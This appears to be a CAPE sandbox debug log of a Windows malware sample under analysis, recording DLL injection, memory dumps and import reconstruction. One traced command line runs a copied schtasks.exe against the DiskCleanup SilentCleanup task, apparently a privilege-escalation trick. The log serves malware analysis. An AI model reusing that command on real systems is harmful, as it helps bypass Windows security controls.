2020-03-24 10:13:26,615 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,615 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:26,631 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:26,631 [root] DEBUG: DumpProcessFixImports: Instantiating PeParser with address: 0x00C80000
2020-03-24 10:13:26,631 [root] DEBUG: DumpProcessFixImports: Module entry point VA is 0x00C81BCA
2020-03-24 10:13:26,631 [root] DEBUG: Module image dump success
2020-03-24 10:13:26,631 [root] DEBUG: DumpProcessFixImports: Found IAT - 0xc80ffc, size: 0x1ec
2020-03-24 10:13:26,631 [root] DEBUG: IAT parsing finished, found 116 valid APIs, missed 0 APIs
2020-03-24 10:13:26,648 [root] DEBUG: Adding module to module list: advapi32.dll
2020-03-24 10:13:26,648 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:26,648 [root] DEBUG: Adding module to module list: msvcrt.dll
2020-03-24 10:13:26,648 [root] DEBUG: Adding module to module list: ntdll.dll
2020-03-24 10:13:26,648 [root] DEBUG: Adding module to module list: user32.dll
2020-03-24 10:13:26,648 [root] DEBUG: Adding module to module list: ws2_32.dll
2020-03-24 10:13:26,663 [root] DEBUG: Adding module to module list: shlwapi.dll
2020-03-24 10:13:26,663 [root] DEBUG: Warning - IAT is not inside the PE image, requires rebasing.
2020-03-24 10:13:26,663 [root] DEBUG: Invalid PE file: import table rebuild failed.
2020-03-24 10:13:26,663 [root] DEBUG: Import table rebuild failed, falling back to unfixed dump.
2020-03-24 10:13:26,694 [root] INFO: Added new CAPE file to list with path: C:\uGrmFZ\CAPE\1592_56272227126132024232020
2020-03-24 10:13:26,740 [root] DEBUG: DoProcessDump: Full process memory dump saved to file: C:\uGrmFZ\memory\1592.dmp.
2020-03-24 10:13:26,740 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 10:13:26,740 [root] INFO: Notified of termination of process with pid 1592.
2020-03-24 10:13:26,990 [root] INFO: Announced 32-bit process name: schtasks.exe pid: 2212
2020-03-24 10:13:26,990 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:26,990 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:26,990 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:26,990 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:27,006 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:27,006 [root] DEBUG: Loader: Injecting process 2212 (thread 972) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:27,006 [root] DEBUG: Process image base: 0x00E00000
2020-03-24 10:13:27,006 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:27,038 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 10:13:27,052 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:27,052 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2212
2020-03-24 10:13:27,099 [root] INFO: Announced 32-bit process name: schtasks.exe pid: 2212
2020-03-24 10:13:27,099 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:27,099 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:27,099 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:27,099 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:27,099 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:27,099 [root] DEBUG: Loader: Injecting process 2212 (thread 972) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:27,115 [root] DEBUG: Process image base: 0x00E00000
2020-03-24 10:13:27,115 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:27,115 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 10:13:27,115 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:27,115 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2212
2020-03-24 10:13:27,427 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 10:13:27,427 [root] DEBUG: Full process memory dumps enabled.
2020-03-24 10:13:27,427 [root] DEBUG: Import reconstruction of process dumps enabled.
2020-03-24 10:13:27,427 [root] DEBUG: Process dumps enabled.
2020-03-24 10:13:27,427 [root] INFO: Disabling sleep skipping.
2020-03-24 10:13:27,443 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 10:13:27,443 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2212 at 0x74880000, image base 0xe00000, stack from 0x106000-0x110000
2020-03-24 10:13:27,443 [root] DEBUG: Commandline: C:\Users\Public\schtasks  \Run \TN \Microsoft\Windows\DiskCleanup\SilentCleanup \I.
2020-03-24 10:13:27,443 [root] INFO: Added new process to list with pid: 2212
2020-03-24 10:13:27,443 [root] INFO: Monitor successfully loaded in process with pid 2212.
2020-03-24 10:13:27,506 [root] DEBUG: DLL loaded at 0x74AA0000: C:\Windows\SysWOW64\VERSION (0x9000 bytes).
2020-03-24 10:13:27,506 [root] DEBUG: DLL unloaded from 0x00E00000.
2020-03-24 10:13:29,361 [root] INFO: Stopped Task Scheduler Service
2020-03-24 10:13:29,378 [root] INFO: Started Task Scheduler Service
2020-03-24 10:13:29,392 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:29,392 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:29,392 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:29,392 [lib.api.process] INFO: 64-bit DLL to inject is C:\lwhhhat\dll\GCogZIdy.dll, loader C:\lwhhhat\bin\wgJoSRuu.exe
2020-03-24 10:13:29,408 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:29,408 [root] DEBUG: Loader: Injecting process 816 (thread 0) with C:\lwhhhat\dll\GCogZIdy.dll.
2020-03-24 10:13:29,408 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 820, handle 0x84
2020-03-24 10:13:29,408 [root] DEBUG: Process image base: 0x00000000FFA10000
2020-03-24 10:13:29,408 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2020-03-24 10:13:29,408 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2020-03-24 10:13:29,456 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 10:13:29,456 [root] DEBUG: Full process memory dumps enabled.
2020-03-24 10:13:29,456 [root] DEBUG: Import reconstruction of process dumps enabled.
2020-03-24 10:13:29,470 [root] DEBUG: Process dumps enabled.
2020-03-24 10:13:29,470 [root] INFO: Disabling sleep skipping.
2020-03-24 10:13:29,720 [root] WARNING: Unable to place hook on LockResource
2020-03-24 10:13:29,720 [root] WARNING: Unable to hook LockResource
2020-03-24 10:13:30,125 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 816 at 0x0000000074460000, image base 0x00000000FFA10000, stack from 0x0000000002646000-0x0000000002650000
2020-03-24 10:13:30,203 [root] DEBUG: Commandline: C:\Windows\sysnative\svchost.exe -k netsvcs.
2020-03-24 10:13:30,203 [root] INFO: Added new process to list with pid: 816
2020-03-24 10:13:30,203 [root] INFO: Monitor successfully loaded in process with pid 816.
2020-03-24 10:13:30,266 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2020-03-24 10:13:30,266 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2020-03-24 10:13:30,266 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\GCogZIdy.dll.
2020-03-24 10:13:31,046 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF98B0000 to caller regions list (msvcrt::memcpy).
2020-03-24 10:13:31,358 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFCEF0000 to caller regions list (ntdll::NtCreateFile).
2020-03-24 10:13:31,358 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFCEF0000 to caller regions list (ntdll::NtCreateFile).
2020-03-24 10:13:31,358 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFCEF0000 to caller regions list (ntdll::NtCreateFile).
2020-03-24 10:13:31,842 [lib.api.process] WARNING: Unable to find process dump for process 816.
2020-03-24 10:13:31,842 [root] INFO: Process with pid 816 has terminated
2020-03-24 10:13:32,295 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2020-03-24 10:13:32,372 [root] DEBUG: DLL loaded at 0x747D0000: C:\Windows\SysWOW64\taskschd (0x7d000 bytes).
2020-03-24 10:13:32,559 [root] DEBUG: DLL loaded at 0x74500000: C:\Windows\System32\mstask (0x35000 bytes).
2020-03-24 10:13:32,607 [root] DEBUG: DLL loaded at 0x74360000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\COMCTL32 (0x19e000 bytes).
2020-03-24 10:13:32,732 [root] DEBUG: DLL loaded at 0x74350000: C:\Windows\SysWOW64\secur32 (0x8000 bytes).
2020-03-24 10:13:32,825 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\SysWOW64\cryptsp (0x16000 bytes).
2020-03-24 10:13:32,825 [root] DEBUG: DLL loaded at 0x74340000: C:\Windows\SysWOW64\credssp (0x8000 bytes).
2020-03-24 10:13:32,825 [root] DEBUG: DLL unloaded from 0x74C70000.
2020-03-24 10:13:32,825 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2212
2020-03-24 10:13:32,825 [root] DEBUG: GetHookCallerBase: thread 972 (handle 0x0), return address 0x00E17569, allocation base 0x00E00000.
2020-03-24 10:13:32,841 [root] DEBUG: DoProcessDump: Created dump file for full process memory dump: C:\uGrmFZ\memory\2212.dmp.
2020-03-24 10:13:32,918 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00E00000.
2020-03-24 10:13:32,918 [root] DEBUG: ApiReader: module list size: 27
2020-03-24 10:13:32,918 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,934 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,934 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:32,934 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,043 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,043 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,043 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,075 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,075 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,075 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,075 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,075 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,075 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,075 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,075 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:33,089 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:33,089 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,089 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,089 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,089 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,089 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,089 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,089 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,105 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,105 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,105 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,105 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,105 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,105 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,153 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,153 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,153 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,153 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,153 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,153 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,153 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,153 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,153 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,184 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,184 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,184 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,184 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,184 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,184 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,184 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,200 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,200 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,200 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,200 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,200 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,200 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,200 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,214 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:33,214 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:33,214 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:33,214 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:33,214 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:33,214 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:33,214 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:33,214 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:33,230 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,230 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,230 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,230 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:33,230 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,230 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,230 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,230 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,262 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,262 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,262 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:33,262 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,262 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,262 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,262 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,262 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,278 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,278 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,278 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,278 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,278 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,278 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,278 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,278 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
